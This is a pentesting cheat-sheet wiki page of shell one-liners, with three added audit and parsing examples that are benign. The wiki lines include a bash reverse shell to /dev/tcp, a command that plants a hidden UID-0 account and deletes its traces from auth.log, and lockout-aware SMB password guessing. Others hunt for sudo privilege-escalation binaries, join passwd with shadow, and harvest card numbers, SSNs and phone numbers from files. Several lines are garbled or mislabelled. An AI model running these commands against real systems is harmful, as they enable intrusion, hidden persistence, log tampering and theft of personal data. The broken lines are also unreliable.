From BHaFSec Pentesting Notes Wiki

Victim Info

id && /sbin/ifconfig && uname -a

Check outbound port egress

for ((i=1; i<1024; i++)) do nc -z -v $i | grep "Yep"; done

Reverse Shell

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Transfer files through SSH

ssh <USER>@<HOST/IP> "cat test.tar.gz" > test.tar.gz

root useradd one-liner

USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here" && sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 --non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' /var/log/auth.log

List all UIDs and their group memberships

for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null

List all super user accounts

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
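Added example (not from the wiki): the two checks above, extra UID-0 accounts and reused UIDs, folded into one audit function that can be pointed at any passwd-format file, so the same check runs from a cron job or against a container image. The function name and the sample passwd file are constructed for this example.

```shell
# Audit a passwd-format file for UID-0 accounts other than root and for
# UIDs shared by more than one account.
audit_passwd() {
  # $1: passwd-format file to audit (assumed argument; defaults to /etc/passwd)
  awk -F: '
    /^#/ || NF < 7 { next }                       # skip comments and junk lines
    $3 == 0 && $1 != "root" { print "UID0 " $1 }  # any UID-0 account besides root
    {
      count[$3]++
      names[$3] = names[$3] (names[$3] ? "," : "") $1
    }
    END {
      for (u in count)
        if (count[u] > 1) print "DUPUID " u " " names[u]
    }
  ' "${1:-/etc/passwd}"
}

# Constructed sample input: an extra UID-0 account "toor" and two users
# (alice, bob) that share UID 1000.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0::/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1000:1000:Bob:/home/bob:/bin/bash
EOF

audit_passwd "$SAMPLE_PASSWD"
```

On the sample this prints `UID0 toor` plus one `DUPUID` line for UID 0 (root,toor) and one for UID 1000 (alice,bob); run it with no argument to audit the live /etc/passwd.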

Can the current user run any 'interesting' binaries as root, and if so also display the binary permissions etc.

sudo -l 2>/dev/null | grep -Ew 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null

External IP

join -o 1.1,2.2 -1 1 -2 1 -t: passwd shadow
echo "$( hostname --fqdn ) ($(hostname -i)):$( pwd )"
echo addr show|ip -o -b -|cut -d' ' -f2,7

Scan hosts quickly without NMAP

for i in 172.16.0.{1..254}; do (ping -c1 $i > /dev/null && echo $i) & done > pinged-hosts

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done

Strip Credit Card Numbers from a file

grep '\([345]\{1\}[0-9]\{3\}\|6011\)\{1\}[ -]\?[0-9]\{4\}[ -]\?[0-9]\{2\}[-]\?[0-9]\{2\}[ -]\?[0-9]\{1,4\}' -o CCData.txt
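Added example (not from the wiki): the card-number pattern above rewritten as an ERE and combined with a Luhn checksum, so a data-discovery sweep over a file share reports far fewer false positives (nearly all random digit strings fail Luhn, every real PAN passes it). The function names, the sample file and the well-known test card numbers in it are constructed for this example.

```shell
# Return 0 if the digits of $1 (separators allowed) satisfy the Luhn checksum.
luhn_ok() {
  printf '%s\n' "$1" | sed 's/[ -]//g' | awk '{
    n = length($0); sum = 0; dbl = 0
    for (i = n; i >= 1; i--) {                 # walk digits right to left
      d = substr($0, i, 1) + 0
      if (dbl) { d *= 2; if (d > 9) d -= 9 }   # double every second digit
      sum += d; dbl = !dbl
    }
    if (sum % 10 == 0) exit 0
    exit 1
  }'
}

# Scan file $1 with the wiki pattern (as an ERE) and print only candidates
# that pass Luhn.
find_card_numbers() {
  grep -Eo '([345][0-9]{3}|6011)[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{1,4}' "$1" |
  while IFS= read -r cand; do
    luhn_ok "$cand" && printf '%s\n' "$cand"
  done
}

# Constructed sample: two public test PANs (Visa 4111..., Mastercard 5500...),
# a near-miss that fails Luhn, and a 16-digit order id that matches the
# pattern but also fails Luhn.
CARD_SAMPLE=$(mktemp)
cat > "$CARD_SAMPLE" <<'EOF'
customer visa 4111-1111-1111-1111 on file
mastercard 5500 0000 0000 0004 charged
typo 4111 1111 1111 1112 rejected
order 3456789012345678 shipped
EOF

find_card_numbers "$CARD_SAMPLE"
```

Only the two test PANs are printed; the raw grep alone would have reported all four lines.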

Strip SSN's from a file

egrep "[0-9]{3}[-]?[0-9]{2}[-]?[0-9]{4}" file
grep '[0-9]\{3\}-[0-9]\{2\}-[0-9]\{4\}' -o ssn.txt

Strip Phone Numbers from a file

egrep "[(]?[2-9]{1}[0-9]{2}[-). ]?[2-9]{1}[0-9]{2}[-. ]?[0-9]{4}" filename

Pipe Phone Numbers from a file to OpenCNAM and output CID+# to File

<numbers.txt xargs -I % curl -w "-%\n" >>output.txt

while read NUM; do curl$NUM?account_sid=SID&auth_token=TOKEN -w "-%\n" > results.txt < numbers.txt

Guess SMB passwords online without locking accounts. You need to know lockout threshold and observation window first.

for pass in $(cat passwords.txt); do msfcli auxiliary/scanner/smb/smb_login RHOSTS= SMBPASS=$pass USER_FILE=/users.txt SMBDOMAIN=x E; sleep 360; done

Combine multi-column text into one column (for example: the output of "net users /domain"):

awk '{ for(i=1;i<=NF;i++) print $i }' inputfile.txt > outputfile.txt

From @MrMindscrew - one-liner to use enum4linux from @portcullislabs and snag a username list:

enum4linux -U | grep "user:" | awk -F ":" ' { print $2 } ' | awk -F " " ' { print $1 } ' | sed 's/.*\[\([^]]*\)\].*/\1/g'

From "normal" nmap output, get list of IPs that do not enforce SMB signing:

awk '/^Nmap/ {a=$0} /signing disabled/ {print a}' filename.nmap | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

From "grepable" nmap output, create one text file per open port, and include each IP with that port open in that text file:

awk '/^Host/ {for(i=3;i<=NF;i++){if(sub(/\/open\/.*/,"",$i))print$2>>(""$i"-open.txt");close(""$i"-open.txt");}}' svc.gnmap
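Added example (not from the wiki): a reusable parser for the same "grepable" (-oG) format that answers "which hosts have port N open?", splitting the line on tabs so that service/version strings containing spaces (which break the whitespace-split awk above) are handled. The function name and the sample .gnmap lines are constructed for this example.

```shell
# Print the IP of every host in .gnmap file $1 that has TCP port $2 open.
hosts_with_open_port() {
  awk -F'\t' -v port="$2" '
    /^Host:/ {
      ip = $1; sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
      for (f = 2; f <= NF; f++) {
        if ($f !~ /^Ports: /) continue
        n = split(substr($f, 8), entries, ", ")   # drop "Ports: " prefix
        for (e = 1; e <= n; e++) {
          # fields: port/state/proto/owner/service/rpc/version/
          split(entries[e], p, "/")
          if (p[1] == port && p[2] == "open" && p[3] == "tcp") print ip
        }
      }
    }' "$1"
}

# Constructed sample .gnmap: three hosts, a version string with spaces,
# and one port that is filtered rather than open.
GNMAP_SAMPLE=$(mktemp)
{
  printf 'Host: 10.0.0.5 ()\tStatus: Up\n'
  printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 445/open/tcp//microsoft-ds///\tIgnored State: closed (998)\n'
  printf 'Host: 10.0.0.7 (fileserver)\tPorts: 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\n'
  printf 'Host: 10.0.0.9 ()\tPorts: 22/closed/tcp//ssh///\n'
} > "$GNMAP_SAMPLE"

hosts_with_open_port "$GNMAP_SAMPLE" 445
```

For port 445 this prints 10.0.0.5 and 10.0.0.7; 10.0.0.9 is skipped because its only port is closed, and asking for 3389 prints nothing because that port is filtered, not open.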